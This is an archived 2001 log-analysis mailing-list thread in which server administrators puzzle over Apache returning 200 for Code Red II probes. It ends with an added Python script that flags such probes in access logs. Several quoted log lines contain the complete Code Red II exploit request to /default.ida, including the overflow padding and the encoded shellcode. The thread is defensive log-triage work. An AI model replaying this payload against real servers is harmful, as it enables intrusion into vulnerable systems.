What is the question: are you wondering why any UNIX box would actually have a default.ida?

Well, there are a number of packages that implement Windows functions for UNIX, for example, Sun Microsystems now own Chili!Soft ASP, which is M$ ASP for UNIX. I believe there are similar packages for things besides ASP too. Is it possible that the servers in question have something like that installed? Apache FrontPage extensions maybe?

Also, I recall some people discussing writing a dummy script that actually did something useful, like email the administrator of the client's netblock, or something, reporting the hit.

At 03:57 PM 9/12/2001 -0500, you wrote:
>Yes, I have four of them (very odd...)
>
>root@www:/var/log/apache# grep "default.ida" usb-access.log | grep "HTTP/1.0\" 200"
>192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
>211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
>200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
>195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
>root@www:/var/log/apache#
>
>
>Sweth Chandramouli wrote:
>>
>> This probably isn't appropriate for this list, or at least is more appropriate for other lists, but I'm tired (and about to go to sleep now that I've finally confirmed that none of my friends have been blown up or crushed by falling buildings) and figured the folks here might be likely to have seen this if anyone has. So, has anyone seen an Apache server return a 200 rather than 404 (according to Apache's logs) in response to an attempted Code Red II exploit? I've seen a single occurrence of it to date, on a Solaris machine that quite regularly gets such attempts; all of the log entries for those other attempts (both before and since) had the proper 404 response code, but this particular one doesn't:
>>
>> ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 - "-" "-"
>>
>> I've only tracked down one other example of this mentioned on the web, at <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian, who reported that incident, never figured out what caused it, either.
>>
>> Could anyone who has seen this (or has a good idea of what it is) email me off-list?
>>
>> Thanks,
>>
>> Sweth.
>>
>> --
>> Sweth Chandramouli ; <svcat_private>
>> President, Idiopathic Systems Consulting
>
>--
>djenkinsat_private Universal Savings Bank.
>Security Administrator, Unix Administrator, Alpha Geek
>
>The three most dangerous things are a programmer with a soldering iron, a manager who codes, and a user who gets ideas.
>
>---------------------------------------------------------------------
>To unsubscribe, e-mail: loganalysis-unsubscribeat_private
>For additional commands, e-mail: loganalysis-helpat_private

----------------------------------------------------
Jonathan Wilson
System Administrator
Cedar Creek Software http://www.cedarcreeksoftware.com
Central Texas IT http://www.centraltexasit.com
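An added example, not posted by anyone in this thread, of the check the grep pipeline above performs: it parses Apache access-log lines, picks out /default.ida probes, and reports any that did not get the expected 404, which is the anomaly the thread is asking about. The sample log lines are constructed (documentation addresses, payload truncated), and the field layout assumed is the standard Apache common/combined format.

```python
import re
from collections import Counter

# Apache common/combined log: host ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (not from the thread). The Code Red II query string is
# truncated to a recognisable stub; only the target path and status code matter here.
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2001:22:13:19 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 285
192.0.2.11 - - [20/Aug/2001:05:06:41 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 200 -
192.0.2.12 - - [21/Aug/2001:10:00:00 -0500] "GET /index.html HTTP/1.1" 200 1043
192.0.2.13 - - [22/Aug/2001:16:36:36 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 200 -
this line is deliberately malformed and must be skipped, not crash the parser
"""


def parse_line(line):
    """Return a dict of fields for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def code_red_hits(log_text):
    """Yield parsed entries whose request path targets /default.ida (a Code Red probe)."""
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and entry["path"].lower().startswith("/default.ida"):
            yield entry


def status_summary(log_text):
    """Count /default.ida probes by HTTP status; anything but 404 on a UNIX Apache box is worth a look."""
    return Counter(e["status"] for e in code_red_hits(log_text))


def unexpected_responses(log_text, expected="404"):
    """Return (host, time, status) for probes that did NOT get the expected status, for follow-up."""
    return [(e["host"], e["time"], e["status"])
            for e in code_red_hits(log_text) if e["status"] != expected]


if __name__ == "__main__":
    print(status_summary(SAMPLE_LOG))
    for host, when, status in unexpected_responses(SAMPLE_LOG):
        print(f"{host} {when} -> {status}")
```

Point the functions at the real access log (read it into a string) to reproduce the thread's grep; a 200 here means some handler on the server answered the request, which is what the questions about ASP emulation and FrontPage extensions above are trying to explain.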
This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 15:34:30 PDT